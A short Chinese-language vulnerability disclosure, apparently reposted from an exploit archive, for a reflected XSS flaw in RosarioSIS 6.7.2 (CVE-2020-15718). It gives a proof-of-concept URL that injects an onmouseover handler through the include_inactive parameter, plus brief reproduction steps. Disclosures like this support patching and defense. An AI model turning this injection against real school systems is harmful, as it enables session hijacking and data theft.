RosarioSIS 6.7.2 跨站脚本(XSS)漏洞利用详情
漏洞标题:RosarioSIS 6.7.2 - 跨站脚本(XSS)
日期:2025-11-25
漏洞作者:CodeSecLab
供应商主页:https://gitlab.com/francoisjacquet/rosariosis
软件链接:https://gitlab.com/francoisjacquet/rosariosis
版本:6.7.2
测试环境:Windows
CVE:CVE-2020-15718
概念验证(PoC)
http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"
复现步骤
- 以管理员用户身份登录。
- 发送上述请求。
- 观察结果。
vFeWrvjTa1MAJGiVvh58g34NURJ0b57eIr+/Db+QwMo=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
浙公网安备 33010602011771号